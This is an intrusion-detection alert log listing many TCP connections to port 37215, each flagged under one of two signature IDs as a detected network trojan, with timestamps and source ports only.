          Timestamp:06/08/24-15:05:11.173729
          SID:2829579
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463677
          SID:2835222
          Source Port:43096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241148
          SID:2835222
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792508
          SID:2829579
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035046
          SID:2835222
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241533
          SID:2829579
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275667
          SID:2829579
          Source Port:44276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742514
          SID:2829579
          Source Port:39812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893856
          SID:2835222
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781330
          SID:2829579
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177580
          SID:2835222
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741309
          SID:2835222
          Source Port:60942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819397
          SID:2835222
          Source Port:44252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107361
          SID:2829579
          Source Port:55836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468901
          SID:2829579
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669869
          SID:2835222
          Source Port:51104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355422
          SID:2835222
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745627
          SID:2829579
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005470
          SID:2829579
          Source Port:34452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842199
          SID:2835222
          Source Port:41802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518136
          SID:2829579
          Source Port:44508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782886
          SID:2829579
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796248
          SID:2829579
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242973
          SID:2829579
          Source Port:56184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.831706
          SID:2835222
          Source Port:51390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513194
          SID:2835222
          Source Port:42758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396800
          SID:2835222
          Source Port:42020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130734
          SID:2835222
          Source Port:43596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354146
          SID:2829579
          Source Port:60332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842333
          SID:2835222
          Source Port:33088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161678
          SID:2829579
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441066
          SID:2835222
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780863
          SID:2829579
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456174
          SID:2835222
          Source Port:48704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895771
          SID:2829579
          Source Port:54314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128131
          SID:2835222
          Source Port:46672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262474
          SID:2829579
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671451
          SID:2835222
          Source Port:35158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820598
          SID:2829579
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469107
          SID:2829579
          Source Port:34088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669701
          SID:2835222
          Source Port:40734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445810
          SID:2835222
          Source Port:51098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404467
          SID:2829579
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812753
          SID:2835222
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820934
          SID:2835222
          Source Port:54520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354125
          SID:2835222
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271311
          SID:2835222
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188971
          SID:2829579
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159478
          SID:2829579
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911845
          SID:2829579
          Source Port:36636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463446
          SID:2835222
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860862
          SID:2829579
          Source Port:34548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162660
          SID:2835222
          Source Port:56294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808008
          SID:2835222
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895072
          SID:2835222
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127472
          SID:2829579
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509713
          SID:2829579
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511651
          SID:2829579
          Source Port:60036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2835222
          Source Port:39932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810953
          SID:2835222
          Source Port:46888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268493
          SID:2829579
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180012
          SID:2835222
          Source Port:56662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471459
          SID:2829579
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745152
          SID:2835222
          Source Port:59682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110424
          SID:2829579
          Source Port:50024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262488
          SID:2835222
          Source Port:32972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238179
          SID:2835222
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547462
          SID:2829579
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441890
          SID:2829579
          Source Port:41384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157773
          SID:2829579
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742702
          SID:2835222
          Source Port:47236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066396
          SID:2835222
          Source Port:41380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671519
          SID:2829579
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896614
          SID:2829579
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170683
          SID:2829579
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151061
          SID:2829579
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188214
          SID:2829579
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732306
          SID:2835222
          Source Port:53318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160809
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180663
          SID:2835222
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378300
          SID:2829579
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465236
          SID:2835222
          Source Port:53696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894515
          SID:2829579
          Source Port:53212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468222
          SID:2829579
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402275
          SID:2835222
          Source Port:50348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163265
          SID:2829579
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044938
          SID:2829579
          Source Port:44016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056479
          SID:2829579
          Source Port:43668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792301
          SID:2835222
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780471
          SID:2829579
          Source Port:60058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460681
          SID:2835222
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841971
          SID:2829579
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894471
          SID:2829579
          Source Port:34632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396784
          SID:2829579
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174442
          SID:2829579
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799987
          SID:2829579
          Source Port:60088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184064
          SID:2829579
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270375
          SID:2829579
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159855
          SID:2829579
          Source Port:43848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745547
          SID:2829579
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446052
          SID:2829579
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176826
          SID:2835222
          Source Port:38624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672641
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780940
          SID:2835222
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036500
          SID:2829579
          Source Port:48392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261091
          SID:2829579
          Source Port:40084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897395
          SID:2829579
          Source Port:53678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132592
          SID:2835222
          Source Port:47070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017152
          SID:2829579
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463435
          SID:2829579
          Source Port:33998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446352
          SID:2835222
          Source Port:50624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709035
          SID:2835222
          Source Port:40286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178549
          SID:2829579
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162926
          SID:2829579
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706856
          SID:2829579
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133172
          SID:2835222
          Source Port:39628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470681
          SID:2835222
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788282
          SID:2835222
          Source Port:38010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409929
          SID:2829579
          Source Port:32992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517869
          SID:2829579
          Source Port:54644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178327
          SID:2835222
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744940
          SID:2829579
          Source Port:56336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858352
          SID:2835222
          Source Port:34454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892218
          SID:2829579
          Source Port:50500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.853967
          SID:2835222
          Source Port:53058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734581
          SID:2829579
          Source Port:47942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081170
          SID:2835222
          Source Port:34768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470457
          SID:2829579
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356555
          SID:2835222
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269136
          SID:2829579
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912745
          SID:2829579
          Source Port:57022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191918
          SID:2835222
          Source Port:46930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471393
          SID:2835222
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704832
          SID:2835222
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729967
          SID:2835222
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669967
          SID:2829579
          Source Port:39150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732370
          SID:2829579
          Source Port:41880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894762
          SID:2829579
          Source Port:51562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306575
          SID:2829579
          Source Port:40788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396125
          SID:2835222
          Source Port:43990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.064409
          SID:2829579
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128665
          SID:2829579
          Source Port:48234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151265
          SID:2829579
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017091
          SID:2835222
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510085
          SID:2835222
          Source Port:56094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257560
          SID:2835222
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514262
          SID:2829579
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787586
          SID:2835222
          Source Port:56838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175003
          SID:2829579
          Source Port:50608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861019
          SID:2829579
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044860
          SID:2829579
          Source Port:52004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858999
          SID:2835222
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159054
          SID:2835222
          Source Port:46862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.795324
          SID:2835222
          Source Port:48112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132367
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188971
          SID:2835222
          Source Port:33464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783863
          SID:2829579
          Source Port:49656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787847
          SID:2835222
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164791
          SID:2835222
          Source Port:49448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514435
          SID:2829579
          Source Port:52410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440830
          SID:2829579
          Source Port:42318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842272
          SID:2829579
          Source Port:44170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892179
          SID:2835222
          Source Port:39914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667017
          SID:2829579
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862413
          SID:2835222
          Source Port:38042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887040
          SID:2835222
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148655
          SID:2835222
          Source Port:54212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600300
          SID:2835222
          Source Port:53808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781992
          SID:2835222
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911524
          SID:2835222
          Source Port:45848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829794
          SID:2829579
          Source Port:47994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041983
          SID:2829579
          Source Port:53096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242655
          SID:2835222
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394420
          SID:2835222
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516964
          SID:2835222
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155885
          SID:2835222
          Source Port:52238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019882
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804362
          SID:2829579
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084837
          SID:2835222
          Source Port:34222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795303
          SID:2829579
          Source Port:53006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747687
          SID:2835222
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668504
          SID:2835222
          Source Port:37584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155452
          SID:2829579
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2829579
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831235
          SID:2829579
          Source Port:33786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470599
          SID:2829579
          Source Port:32802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178418
          SID:2829579
          Source Port:32876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824917
          SID:2835222
          Source Port:47632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115956
          SID:2829579
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668663
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132026
          SID:2829579
          Source Port:49072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448584
          SID:2835222
          Source Port:47418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131457
          SID:2835222
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552174
          SID:2829579
          Source Port:43602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295032
          SID:2835222
          Source Port:48944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275710
          SID:2829579
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801045
